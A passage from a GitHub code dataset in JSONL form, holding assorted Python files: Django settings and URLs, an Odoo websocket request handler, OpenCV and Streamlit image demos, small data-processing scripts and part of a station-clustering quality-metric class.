'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard',\n },\n 'syslog': {\n 'class': 'logging.handlers.SysLogHandler',\n 'formatter': 'standard',\n 'facility': 'user',\n }\n },\n 'loggers': {\n '': {\n 'handlers': ['console', 'syslog'],\n 'level': 'INFO',\n 'disabled': False,\n 'propagate': True,\n }\n },\n}\n\nSESSION_COOKIE_SECURE = True\n\nX_FRAME_OPTIONS = 'DENY'\n","repo_name":"khdc-me/website","sub_path":"config/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"71430014182","text":"# ______Working With Subscribers______\nimport csv\nfrom dataclasses import dataclass\n\n\nclass Subscriber:\n def __init__(self, type_of_accrual, previous_accruals, current_accruals):\n self.type_of_accrual = type_of_accrual\n self.previous_accruals = previous_accruals\n self.current_accruals = current_accruals\n\n\n def get_accruals(self):\n if self.type_of_accrual == 1:\n return 301.26\n else:\n return (self.current_accruals - self.previous_accruals) * 1.52\n\nwith open(\"абоненты.csv\", encoding='utf-8') as r_file:\n file_reader = csv.DictReader(r_file, delimiter = \";\")\n count = 0\n # Считывание данных из CSV файла\n for row in file_reader:\n if count == 0:\n f = open('Начисления_абоненты.csv', mode=\"w\", encoding='utf-8')\n file_writer = csv.writer(f, delimiter=\";\", lineterminator=\"\\r\")\n file_writer.writerow([\"Индекс\", \"Фамилия\", \"Улица\", \"№ дома\", \"№ Квартиры\",\n \"Тип начисления\", \"Предыдущее\", \"Текущее\", \"Начислено\"])\n # Запись в файл\n accrual = Subscriber(int(row['Тип начисления']), int(row['Предыдущее']), int(row['Текущее']))\n file_writer.writerow([row['Индекс'], row['Фамилия'], row['Улица'], row['№ дома'], row['№ Квартиры'], row['Тип начисления'], row['Предыдущее'], row['Текущее'], accrual.get_accruals()])\n count += 1\n print(f'Всего в файле {count + 1} строк.')\n\n\n","repo_name":"DXP-Code/STACK_Case_assignment","sub_path":"WWS.py","file_name":"WWS.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31968587451","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.rc(\"image\", cmap = \"gray\")\n\npath = \"Images/week4/girl.jpg\"\nimg = cv2.imread(path, cv2.IMREAD_COLOR)\nimg = cv2.resize(img, None, fx = 0.7,fy = 0.7, interpolation = cv2.INTER_AREA)\norig = img.copy()\n\n#Pivot points on X coordinates\norig_values = np.array([0,50,100,150,200,255])\n#Changes points on Y-axis for each channel\nrCurve = np.array([0,80,150,190,220,255])\nbCurve = np.array([0,20,40,75,150, 255])\n\n# Create Look Up Tables\nfullRange = np.arange(0,256)\nrLUT = np.interp(fullRange, orig_values, rCurve)\nbLUT = np.interp(fullRange, orig_values, bCurve)\n\n#Apply Lookup table to image channels using LUT\nimg[:,:,0] = cv2.LUT(img[:,:,0], bLUT) # for Blue Channel\nimg[:,:,2] = cv2.LUT(img[:,:,2], rLUT) # for Red Channel\n\n# cool thing to join images into one\ncombined = np.hstack([orig, img])\n\n\nplt.plot(fullRange, rLUT, color = 'r')\nplt.plot(fullRange, fullRange, color = 'black')\nplt.plot(fullRange, bLUT, color = 'b')\nplt.show()\n\ncv2.imshow(\"Warming Filter\", combined)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"KSanjayReddy/OpenCvCourse","sub_path":"51.Color_Adjustment_Using_Curves.py","file_name":"51.Color_Adjustment_Using_Curves.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42443054830","text":"import pymongo\nimport datetime\nimport pprint\n\nclient = pymongo.MongoClient()\ndb = client.iot_4\n\n\nuser_1 = {\"user_code\": \"noah\", \n \"card_id\": '123',\n \"power\": 2.0}\n\nuser_2 = {\"user_code\": \"def\", \n \"card_id\": '345',\n \"power\": 1000.0}\n\ndb.users.insert_one(user_1)\ndb.users.insert_one(user_2)\n\n\npoints = db.points\n\npoint_1 = { \"point_code\": \"123\",\n \"state\": \"ready\",\n \"user_code\": \"\",\n \"session\": {\n 'average_points': [0,0,0,0,0],\n \"start_time\": datetime.datetime.utcnow(),\n 'power_used': 0\n }\n }\n\ndb.points.insert_one(point_1)\n","repo_name":"NoahGallant/CU-IOT-Team-1","sub_path":"smart-outlet/server/setup_db.py","file_name":"setup_db.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39706057811","text":"import random\nimport sys\nimport os\n\nfor x in range(0,10):\n print(x, ' ', end='')\nprint('\\n')\n\nL = ['Juice', 'Tomatoes', 'Potatoes', 'Bananas']\nfor y in L:\n print(y, ' ', end='')\nprint('\\n')\n\nfor x in [2,4,6,8,10]:\n print(x)\n\nnum_list = [[1,2,3],[10,20,30],[100,200,300]]\nfor x in range(0,3):\n for y in range(0,3):\n print(num_list[x][y])\n","repo_name":"mrthawee/training","sub_path":"python/basic/5_for_loop.py","file_name":"5_for_loop.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23446280175","text":"import logging\nimport odoo.http\nfrom odooku.request import WebRequestMixin\n\n\n_logger = logging.getLogger(__name__)\n\n\nclass WebSocketRequest(WebRequestMixin, odoo.http.WebRequest):\n\n def __init__(self, httprequest):\n super(WebSocketRequest, self).__init__(httprequest)\n\n def dispatch(self):\n raise NotImplementedError()\n\n\nclass WebSocketRpcRequest(WebSocketRequest):\n\n _request_type = 'json'\n\n def __init__(self, httprequest, data):\n super(WebSocketRpcRequest, self).__init__(httprequest)\n self.params = data.get('params', {})\n self.id = data.get('id')\n self.context = self.params.pop('context', dict(self.session.context))\n\n def dispatch(self):\n try:\n result = self._call_function(**self.params)\n except Exception as exception:\n return self._handle_exception(exception)\n return self._json_response(result)\n\n def _json_response(self, result=None, error=None):\n response = {\n 'jsonrpc': '2.0',\n 'id': self.id\n }\n\n if error is not None:\n response['error'] = error\n if result is not None:\n response['result'] = result\n\n return response\n\n def _handle_exception(self, exception):\n \"\"\"Called within an except block to allow converting exceptions\n to arbitrary responses. Anything returned (except None) will\n be used as response.\"\"\"\n try:\n return super(WebSocketRpcRequest, self)._handle_exception(exception)\n except Exception:\n if not isinstance(exception, (odoo.exceptions.Warning, odoo.http.SessionExpiredException, odoo.exceptions.except_orm)):\n _logger.exception(\"Exception during JSON request handling.\")\n error = {\n 'code': 200,\n 'message': \"Odoo Server Error\",\n 'data': odoo.http.serialize_exception(exception)\n }\n if isinstance(exception, odoo.http.AuthenticationError):\n error['code'] = 100\n error['message'] = \"Odoo Session Invalid\"\n if isinstance(exception, odoo.http.SessionExpiredException):\n error['code'] = 100\n error['message'] = \"Odoo Session Expired\"\n return self._json_response(error=error)\n","repo_name":"odooku/odooku","sub_path":"odooku/services/websocket/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"35"} +{"seq_id":"21132207591","text":"\n# from django.urls import path\n# from .views import ( ContactViewClassBased, FindBlogAPI , \n# DetailViewPost , AddPost,\n# DeleteBlogAPI , AddPostAPI,\n# UpdateBlogAPI , ListViewPostall, \n# searchview , AddPostClassBased, DeleteViewClassBased,\n# ContactViewClassBased , contactview, UpdateViewClassBased\n# )\n\n# urlpatterns = [\n# # path('blog/' , BlogView , name='blogviewname'),\n# path('' , ListViewPostall.as_view() , name=\"ListViewPostallNAME\"),\n# path('ContactClassBased/Contacts/' , contactview.as_view() , name=\"ListViewcontactallNAME\"),\n# path('search/' , searchview , name=\"searchviewname\"),\n# path('Edit/' , UpdateViewClassBased.as_view() , name='EditPostNAME'),\n# path('delete/' , DeleteViewClassBased.as_view() , name='DeletePostNAME'),\n# path('add/' , AddPost , name='AddPostNAME'),\n# path('AddClassBased/' , AddPostClassBased.as_view() , name='AddPostClassBasedNAME'),\n# path('ContactClassBased/' , ContactViewClassBased.as_view() , name='ContactClassBasedNAME'),\n# path('AddPostAPI/' , AddPostAPI , name='AddPostAPIName'),\n# path('FindAPI//' , FindBlogAPI , name='FindBlogAPIName'),\n# path('Find/' , DetailViewPost.as_view() , name=\"DetailViewPostNAME\"), \n# path('DeleteAPI//' , DeleteBlogAPI , name='DeleteBlogAPIName'), \n# path('UpdateAPI//' , UpdateBlogAPI , name='UpdateBlogAPIName'), \n\n# ] \n \n\nfrom django.urls import path\nfrom .views import BlogDetailView, BlogListCreateView, ContactListCreateView\nurlpatterns = [\n path('api/list-create/', BlogListCreateView.as_view(), name='blog-list-create'),\n path('api/detail-update-delete//', BlogDetailView.as_view(), name='blog-detail'),\n path('api/contacts/', ContactListCreateView.as_view(), name='contact-list-create'),\n]\n","repo_name":"hirbodprime/advancedweb","sub_path":"Blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25034488487","text":"import boto3\n\n\n# Create an S3 client\n# s3 = boto3.client(\"s3\")\ns3 = boto3.client(\"s3\", endpoint_url=\"http://localhost:4566\")\n\n# Call the list_buckets method to get all buckets\nresponse = s3.list_buckets()\n\n# Print each bucket name\nprint(\"All S3 Buckets:\")\nfor bucket in response[\"Buckets\"]:\n print(bucket[\"Name\"])\n","repo_name":"vladimirryzhikov/Project_DE_15_03_23","sub_path":"yahoo_data/test_local_buckets.py","file_name":"test_local_buckets.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38427436281","text":"\"\"\"\nhttps://leetcode-cn.com/problems/uOAnQW\n\n“力扣挑战赛”心算项目的挑战比赛中,要求选手从 N 张卡牌中选出 cnt 张卡牌,若这 cnt 张卡牌数字总和为偶数,则选手成绩“有效”且得分为 cnt 张卡牌数字总和。\n给定数组 cards 和 cnt,其中 cards[i] 表示第 i 张卡牌上的数字。 请帮参赛选手计算最大的有效得分。若不存在获取有效得分的卡牌方案,则返回 0。\n\n示例 1:\n\n 输入:cards = [1,2,8,9], cnt = 3\n\n 输出:18\n\n 解释:选择数字为 1、8、9 的这三张卡牌,此时可获得最大的有效得分 1+8+9=18。\n\n示例 2:\n\n 输入:cards = [3,3,1], cnt = 1\n\n 输出:0\n\n 解释:不存在获取有效得分的卡牌方案。\n\n提示:\n 1 <= cnt <= cards.length <= 10^5\n 1 <= cards[i] <= 1000\n\n\"\"\"\nfrom typing import List\n\nclass Solution:\n def maxmiumScore(self, cards: List[int], cnt: int) -> int:\n if cnt == 1: # 如果只选一张卡牌\n max_even = 0 # 初始化最大偶数\n for i in cards: # 遍历所有卡牌\n if i % 2 == 0 and i > max_even: # 如果是偶数而且大于之前的最大偶数:\n max_even = i # 更新最大偶数为 i\n return max_even\n \n cards.sort(reverse = True) # [9,8,2,1]\n score = sum(cards[:cnt]) # score 为最大的 cnt 数字之和\n \n if score % 2 != 0 and len(cards) - cnt >= 1:\n max_odd = -1\n max_even = -1\n for i in range(cnt-1,-1,-1): # 找到前cnt个数中最小的奇数和偶数\n if cards[i] % 2 == 0 and max_even == -1:\n max_even = cards[i]\n if cards[i] % 2 != 0 and max_odd == -1:\n max_odd = cards[i]\n if max_odd != -1 and max_even!=-1:\n break\n min_odd = -1\n min_even = -1\n for i in range(cnt,len(cards)): #找到前cnt个数之后最大的奇数和偶数\n if cards[i] % 2 == 0 and min_even == -1:\n min_even = cards[i]\n if cards[i] % 2 != 0 and min_odd == -1:\n min_odd = cards[i]\n if min_even!=-1 and min_odd!=-1:\n break\n if not(min_odd != -1 and max_even != -1) and not(max_odd != -1 and min_even != -1) :\n # 无法替换数使得和为偶数\n return 0\n if min_odd == -1 or max_even == -1 and not (max_odd == -1 or min_even == -1):\n #只能大偶数换小奇数\n return score - max_odd + min_even\n elif max_odd == -1 or min_even == -1 and not (min_odd == -1 or max_even == -1):\n #只能大奇数换小偶数\n return score - max_even + min_odd\n else:\n #都能换,要比较拿个更划算\n return score - max_even + min_odd if min_odd - max_even > min_even - max_odd else score - max_odd + min_even\n elif score % 2 == 0:\n return score\n else:\n return 0\n\nif __name__ == \"__main__\":\n cards = [1,2,8,9]\n cnt = 3\n sol = Solution()\n result = sol.maxmiumScore(cards, cnt)\n print(result)","repo_name":"jasonmayday/LeetCode","sub_path":"leetcode_cup/1_easy/LCP_40_心算挑战.py","file_name":"LCP_40_心算挑战.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"5760582002","text":"# Convert IP into city name\n# Base on the city name convert into North(1), Middel(2), South(3), East(4), and others(0) \nimport numpy as np\nimport pandas as pd\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager #For Mac OS users\nimport time\n\nfile_name = './3_5_content.json' # 1. Choose the file\nptt = pd.read_json(file_name)\nip_list = list(ptt['IP'])\n\nprint('The program starts...')\n\ncity_list = []\ncount = len(ip_list)\nstart = time.time()\ndriver = webdriver.Chrome(ChromeDriverManager().install()) #For Mac OS users\n#driver = webdriver.Chrome(executable_path=\"chromedriver.exe\") #For Windows users\ndriver.get('https://www.ez2o.com/App/Net/IP')\nfor ip_addr in ip_list:\n print(count,'...')\n count -= 1\n elem = driver.find_element_by_xpath(\"//input[@id='QueryIP']\").clear()\n elem = driver.find_element_by_xpath(\"//input[@id='QueryIP']\")\n elem.send_keys(ip_addr) # ex: 218.173.71.162\n elem = driver.find_element_by_xpath(\"//button[@class='btn btn-primary']\")\n elem.click()\n elem = driver.find_element_by_xpath(\"//tbody/tr[@class='active'][3]/td[2]\")\n city_list.append(elem.text)\ndriver.close()\nend = time.time()\n\nminute = round((end - start)/60)\nsecond = round((end - start)%60)\n\nptt['City'] = city_list\nwith open('3_5_content.json', 'w', encoding='utf-8') as file: # 2. Change the name for the output file\n ptt.to_json(file, force_ascii=False, orient='records')\nprint('Finished')\nprint('Total time:',minute,'m',second,'s')","repo_name":"BrosCoffee/ptt_project","sub_path":"IP_to_Location5.py","file_name":"IP_to_Location5.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27811141424","text":"import cv2\nimport numpy as np\nimport streamlit as st\n\nfrom utils import encontrar_contornos, ordenar_pontos\n\nst.title('POCRS')\nrun = st.checkbox('Run')\nFRAME_WINDOW = st.image([])\ncam = cv2.VideoCapture(0)\nmodo = st.radio('Exibir', ('Normal', 'Cinza', 'Borrado', 'Bordas', 'Maior Contorno', 'Rotacioar imagem'))\n\nwhile run:\n ret, frame = cam.read()\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n (H, W) = img.shape[:2]\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(blur, 60, 160)\n conts, maior = encontrar_contornos(edged)\n if modo == 'Cinza':\n img = gray\n elif modo == 'Borrado':\n img = blur\n elif modo == 'Bordas':\n img = edged\n elif modo == 'Maior Contorno' and maior is not None:\n cv2.drawContours(img, maior, -1, (120, 255, 0), 28)\n cv2.drawContours(img, [maior], -1, (120, 255, 0), 2)\n elif modo == 'Rotacioar imagem' and maior is not None:\n pontos_maior = ordenar_pontos(maior)\n pts1 = np.float32(pontos_maior)\n pts2 = np.float32([[0, 0], [W, 0], [W, H], [0, H]])\n matriz = cv2.getPerspectiveTransform(pts1, pts2)\n img = cv2.warpPerspective(img, matriz, (W, H))\n FRAME_WINDOW.image(img)\nif not run:\n st.write('Parado')\n","repo_name":"LPicinin/POCRS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5328027281","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n'''\n CLASS for community detection in graphs, both spatial and temporal, functions necessary for the station-fault analysis\n'''\n\nclass cluster_quality_metric():\n\n def __init__(self):\n\n self._l_reg_methods = ['Absolute','Average','minPoints','None']\n\n self._max_distance=30.0\n self._minimum_samples=3\n self._algorithm=None\n self._metric=None\n self._cluster_method=None\n self._seed=None\n#d self._force_minPts = True # force to remove subgraphs with < minPts\n self._force_regularity='minPoints' # force Absolute, Average, or None regularity\n self._reg_tol_scaler=0.99 # multiply the regularity by the scaler to reduce the threshold\n\n pass\n\n def set_quality_frame(self, clustering_name: str=\"greedy_modularity_communities\",\n **metric_params: dict):\n\n import traceback\n import numpy as np\n\n self._max_distance=None\n self._minimum_samples=None\n self._algorithm=None\n self._metric=None\n self._cluster_method=None\n self._seed=None\n\n self._name=clustering_name\n try:\n ''' Set the default paramters for the specific clustering method '''\n if 'distance_km' in metric_params:\n if isinstance(metric_params[\"distance_km\"],float) and metric_params[\"distance_km\"] > 0:\n self._max_distance=metric_params[\"distance_km\"]\n else:\n raise ValueError('distance_km %s must be a float > 0.'\n % str(metric_params[\"distance_km\"]))\n\n if 'minimum_samples' in metric_params:\n if isinstance(metric_params[\"minimum_samples\"],(int, np.integer)) and metric_params[\"minimum_samples\"] > 0:\n# if metric_params[\"minimum_samples\"] > 0:\n self._minimum_samples=int(metric_params[\"minimum_samples\"])\n else:\n raise ValueError('minimum_samples %s must be an int > 0.'\n % str(metric_params[\"minimum_samples\"]))\n\n if 'algorithm' in metric_params:\n if isinstance(metric_params[\"algorithm\"],str):\n self._algorithm=metric_params[\"algorithm\"]\n else:\n raise ValueError('algorithm %s is invalid.' % (metric_params[\"algorithm\"]))\n\n if 'metric' in metric_params:\n if isinstance(metric_params[\"metric\"], str):\n self._metric=metric_params[\"metric\"]\n else:\n raise ValueError('metric %s is invalid.' % (metric_params[\"metric\"]))\n\n if 'cluster_method' in metric_params:\n if isinstance(metric_params[\"cluster_method\"], str):\n self._cluster_method=metric_params[\"cluster_method\"]\n else:\n raise ValueError('cluster_method %s is invalid.' % (metric_params[\"cluster_method\"]))\n\n if 'seed' in metric_params:\n if metric_params[\"seed\"] is np.random:\n self._seed=\"random\"\n elif metric_params[\"seed\"] is int:\n self._seed=\"integer\"\n else:\n self._seed=None\n\n except Exception as err:\n print(\"Class cluster_quality_metric [set_quality_frame] Error message:\", err)\n print(traceback.format_exc())\n\n return self\n\n\n def get_seq_params(self, _iter_combos_df, _n_exp_seq: int = 0):\n\n#d import pandas as pd # holds the clustering sequence parameters\n import numpy as np # necessary when using seed = np.random\n import traceback\n\n '''\n Set clustering parameters to execute cloud or graph clustering technique\n\n TODO: use below dictionaries to look up and validate valuses\n (python dictionary key look up not working)\n\n _dict_algorithms = {\"DBSCAN\": [\"auto\", \"ball_tree\", \"kd_tree\", \"brute\"],\n 'HDBSCAN': [\"best\",\"generic\",\"prims_kdtree\",\"prims_balltree\",\"boruvka_kdtree\",\n \"boruvka_balltree\"]}\n _dict_clust_method = {\"HDBSCAN\": [\"leaf\",\"eom\"],\"OPTICS\": [\"xi\",\"dbscan\"]}\n _dict_algorithms = {\"DBSCAN\": [\"auto\", \"ball_tree\", \"kd_tree\", \"brute\"],\n \"HDBSCAN\": \"best\",\"generic\",\"prims_kdtree\",\"prims_balltree\",\n \"boruvka_kdtree\",\"boruvka_balltree\",\n \"OPTICS\": ['auto', 'ball_tree', 'kd_tree', 'brute']\n }\n\n TODO: acquire the lists and dictionaries from the respective cloud and graph clustering classes\n '''\n\n _l_cluster_techniques = ['cloud','graph']\n _l_cloud_cluster_name = ['DBSCAN','HDBSCAN','AFFINITYPROPAGATION','OPTICS','MEANSHIFT',\n 'AGGLOMERATIVE','BIRCH','KMEANS','KNN','DENCLUE',\"SPECTRAL\"]\n _l_graph_cluster_name = [\"GREEDY\",\"NAIVE-GREEDY\",\"LPC\",\"ASYNC-LPA\",\n \"LUKES\",\"ASYNC-FLUID\",\"GIRVAN-NEWMAN\"]\n _dict_algorithms = {\"auto\", \"ball_tree\", \"kd_tree\", \"brute\",\n \"best\",\"generic\",\"prims_kdtree\",\"prims_balltree\",\"boruvka_kdtree\",\"boruvka_balltree\",\n \"kmeans\",\"discretize\"}\n\n _dict_clust_method = {\"leaf\",\"eom\",\"xi\",\"dbscan\",\"arpack\", \"lobpcg\", \"amg\"}\n '''In all instances when possible will be the choice; else it will be '''\n _lst_metric = [\"haversine\",\"euclidean\",\"manhattan\",\"minkowski\",\"precomputed\",\n \"precomputed_nearest_neighbors\",\"nearest_neighbors\",\"rbf\"]\n\n _dict_clust_params = {}\n\n i=_n_exp_seq\n try:\n# ''' Load data from CSV '''\n# _iter_combos_df = pd.read_csv(\"../experiments/cluster_runs.csv\")\n\n ''' Clustering method name is mandatory'''\n if _iter_combos_df.loc[i, 'name'] not in _l_cloud_cluster_name+_l_graph_cluster_name:\n raise AttributeError('%s is not a valid clustering method use \\n%s'\n % (_iter_combos_df.loc[i, 'name'],\n _l_cloud_cluster_name+_l_graph_cluster_name))\n else:\n _s_cloud_clust_name = str(_iter_combos_df.loc[i, 'name'])\n\n ''' Technique - assign the appropriate value based on the clustering name '''\n if _iter_combos_df.loc[i, 'technique'] not in _l_cluster_techniques:\n if _s_cloud_clust_name in _l_cloud_cluster_name:\n _cluster_technique = \"cloud\"\n elif _s_cloud_clust_name in _l_graph_cluster_name:\n _cluster_technique = \"graph\"\n else:\n _cluster_technique = str(_iter_combos_df.loc[i, 'technique'])\n\n ''' Create clustering input parameter Dictionary\n Maximum distance between points and the minimum points are undefined assign defaults '''\n if _iter_combos_df.loc[i, 'maxDistance'].astype(float) <= 1:\n print('maxDistance (Km) must ba a float >= 1.0; proceeding with default maxDistance=30.0 Km')\n _dict_clust_params[\"distance_km\"] = 30.0\n else:\n# _dict_clust_params[\"distance_km\"] = _iter_combos_df.loc[i, 'maxDistance'].astype(float)\n _dict_clust_params[\"distance_km\"] = float(_iter_combos_df.loc[i, 'maxDistance'])\n\n if _iter_combos_df.loc[i, 'minPts'].astype(int) <= 0:\n print('minPts must be an integer > 0; proceeding with default minPts=3')\n _n_min_cloud_clust_size = 3\n else:\n _dict_clust_params[\"minimum_samples\"] = _iter_combos_df.loc[i, 'minPts'].astype(int)\n# _dict_clust_params[\"minimum_samples\"] = int(_iter_combos_df.loc[i, 'minPts'])\n\n ''' Validate and assign algorithim based on the clustering name'''\n if _iter_combos_df.loc[i, 'algorithm'] in _dict_algorithms:\n _dict_clust_params[\"algorithm\"] = str(_iter_combos_df.loc[i, 'algorithm'])\n\n ''' Validate and assign clustering_method based on the clustering name'''\n if _iter_combos_df.loc[i, 'method'] in _dict_clust_method:\n _dict_clust_params[\"cluster_method\"] = str(_iter_combos_df.loc[i, 'method'])\n\n if _iter_combos_df.loc[i, 'metric'] in _lst_metric:\n _dict_clust_params[\"metric\"] = str(_iter_combos_df.loc[i, 'metric'])\n\n if isinstance(_iter_combos_df.loc[i, 'weight'],str):\n _dict_clust_params[\"weight\"] = str(_iter_combos_df.loc[i, 'weight'])\n\n if isinstance(_iter_combos_df.loc[i, 'seed'], str):\n if _iter_combos_df.loc[i, 'seed'] == \"random\":\n self._seed = \"random\"\n _dict_clust_params[\"seed\"] = np.random\n elif _iter_combos_df.loc[i, 'seed'] == \"int\":\n self._seed = \"int\"\n _dict_clust_params[\"seed\"] = int\n else:\n pass\n\n# if _iter_combos_df.loc[i, 'maxIter'] and _iter_combos_df.loc[i, 'maxIter'] > 0:\n if _iter_combos_df.loc[i, 'maxIter'].astype(int) > 0:\n _dict_clust_params[\"max_iter\"] = int(_iter_combos_df.loc[i, 'maxIter'])\n\n if _iter_combos_df.loc[i, 'randomState'].astype(int) > 0:\n _dict_clust_params[\"random_state\"] = int(_iter_combos_df.loc[i, 'randomState'])\n\n if _iter_combos_df.loc[i, 'numClusters'] > 0:\n _dict_clust_params[\"n_clusters\"] = int(_iter_combos_df.loc[i, 'numClusters'])\n\n# print('Preparing for %s clustering %s with parameters\\n%s'\n# % (_cluster_technique,_s_cloud_clust_name,_dict_clust_params))\n\n except Exception as err:\n print(\"Class cluster_quality_metric [get_seq_params] Error message:\", err)\n print(traceback.format_exc())\n\n return _cluster_technique,_s_cloud_clust_name,_dict_clust_params\n\n ''' Run the cloud or graph clustering sequence for the specific clustering method and parameters '''\n def get_clusters(self,\n _dict_clust_params,\n station_df,\n _cluster_technique: str=\"cloud\",\n _s_cloud_clust_name: str=\"DBSCAN\"):\n\n import cloud_clustering as cc\n import graph_clustering as gc\n import numpy as np\n import networkx as nx\n\n import traceback\n\n# __st_clust_df = station_df.copy()\n arr_st_coords = station_df[['st_lat','st_lon']].to_numpy()\n\n try:\n if _cluster_technique == 'cloud':\n cls_clust = cc.cluster_data(_s_cloud_clust_name,**_dict_clust_params)\n labels, labels_true, clust_centers = cls_clust.get_clusters(arr_st_coords)\n\n if arr_st_coords.shape[0] != labels.shape[0]:\n raise ValueError('Mismatch in station coordinate and labels array sizes to; cannot proceed')\n\n station_df['label'] = labels\n\n elif _cluster_technique == 'graph':\n cls_g_clust = gc.community_detection()\n params = cls_g_clust.set_community_detection_params(_s_cloud_clust_name,**_dict_clust_params)\n\n ''' G_cluster required to distinguish between communities and valid clusters '''\n G_simple, G_clusters = cls_g_clust.get_communities(station_df)\n station_df['label'] = nx.get_node_attributes(G_simple,'label').values()\n\n else:\n raise ValueError('Invalid clustering technique: %s' % _cluster_technique)\n\n ''' Force Regularity of flag is set'''\n\n except Exception as err:\n print(\"Class cluster_quality_metric [get_clusters] Error message:\", err)\n print(traceback.format_exc())\n\n return station_df\n\n ''' Get all quality measures and other parameters for the dataframe with appropriate cluster labels '''\n def get_quality_metrics(self, station_df,lst_graphs):\n\n import dunn as di\n from sklearn import metrics\n import networkx as nx\n import networkx.algorithms.community as nx_comm\n import numpy as np\n import pandas as pd\n import traceback\n\n quality_metric_df = pd.DataFrame([])\n\n try:\n#d _n_num_clust = len(station_df['label'].unique()) # Generated Cluster Count\n _n_num_clust = len([x for x in station_df['label'].unique() if x > -1]) # Generated Cluster Count\n if _n_num_clust <= 1:\n raise ValueError('Cannot compute quality metric for %d clusters' % (_n_num_clust))\n\n ''' returns the simple graph of the clusters and the set dictionary of cluster nodes '''\n G_simple_, l_G_clusters_ = self.__get_graph_n_labels(station_df)\n\n _s_st_types = str(station_df['st_type'].unique()) # Station Types\n _n_tot_num_st = station_df.shape[0] # Station Quantity\n _f_min_dist = self._max_distance # Minimum Distance\n _n_min_pts = self._minimum_samples # Minimum Points\n _s_clust = str(self._name) # Clustering Name\n _s_algo = str(self._algorithm) # Algorithm\n _s_metric = str(self._metric) # Metric\n _s_method = str(self._cluster_method) # Method\n _s_seed = str(self._seed) # Seed\n __lst_valid_cloud_clust = [frozenset(clust) for clust in l_G_clusters_\n if len(clust) >= self._minimum_samples]\n _n_valid_clust = len(__lst_valid_cloud_clust) # Valid Cluster Count\n\n # Clustered Station Count\n _n_sts_in_clusters=0\n for x in __lst_valid_cloud_clust:\n _n_sts_in_clusters += len(x)\n\n _n_noise = station_df.shape[0] - _n_sts_in_clusters # Unclsutered Noise Count\n _n_avg_deg = sum([d for n, d in G_simple_.degree()\n if G_simple_.nodes[n][\"label\"] > -1])/_n_sts_in_clusters # Average Node Degree\n\n ''' Compute the accuracy of r-regularity constraint on the individual clusters by considering the\n systematic error that is a reproducible inaccuracy consistent for the same clustering strategy.\n For such we apply the weighted mean absolute error to estimate the deviation from the expected degree.\n '''\n sum_deg_abs_err=0\n _deg_wmae=0\n _deg_err_st_count=0\n#p print(\"\\nclusters:\",len(lst_graphs))\n for H in lst_graphs:\n H = nx.Graph(H)\n H.remove_nodes_from(list(nx.isolates(H)))\n H.remove_nodes_from([n for n,v in H.nodes(data=True) if v[\"label\"]==-1])\n H_deg_abs_err=0\n _l_deg_diff=[]\n if H.number_of_nodes() > 0:\n _l_deg_diff = [_n_min_pts-1-d for n, d in H.degree()\n if (int(d) < int(_n_min_pts-1) and H.nodes[n][\"label\"] > -1)]\n if len(_l_deg_diff) > 0:\n#p print(\"\\ndegree mean absolute error\")\n#p print(\"minPts:\",_n_min_pts)\n#p print(\"list deg diff:\",_l_deg_diff)\n#p print(\"graph nodes:\",sorted([d for n,d in H.degree()]))\n sum_deg_abs_err += sum(_l_deg_diff)\n _deg_err_st_count += len(_l_deg_diff)\n if _deg_err_st_count > 0:\n _deg_wmae = sum_deg_abs_err/(_deg_err_st_count*(_n_min_pts-1))\n#p print(\"_deg_wmae\", _deg_wmae,_deg_err_st_count)\n\n ''' prepare valid stations for measuring the quality'''\n lst_st = list(nx.get_node_attributes(G_simple_,'pos').values())\n lst_lbl = list(nx.get_node_attributes(G_simple_,'label').values())\n\n _f_silhouette = metrics.silhouette_score(lst_st, lst_lbl,\n metric='haversine') # Silhouette Coefficient\n _f_cal_har = metrics.calinski_harabasz_score(lst_st, lst_lbl) # Calinski Harabaz score\n _f_dav_bould = metrics.davies_bouldin_score(lst_st, lst_lbl) # Davies Bouldin score\n _f_dunn = di.dunn_fast(lst_st, lst_lbl) # Dunn Index\n _f_modul = nx_comm.modularity(G_simple_,l_G_clusters_) # Modularity\n\n try:\n l_conductance = list(nx.conductance(G_simple_, cluster_i, weight='distance')\n for cluster_i in __lst_valid_cloud_clust)\n _f_conduct = sum(l_conductance)/len(l_conductance) # Conductance Average\n except Exception:\n _f_conduct = 0\n _f_cover = nx_comm.coverage(G_simple_, 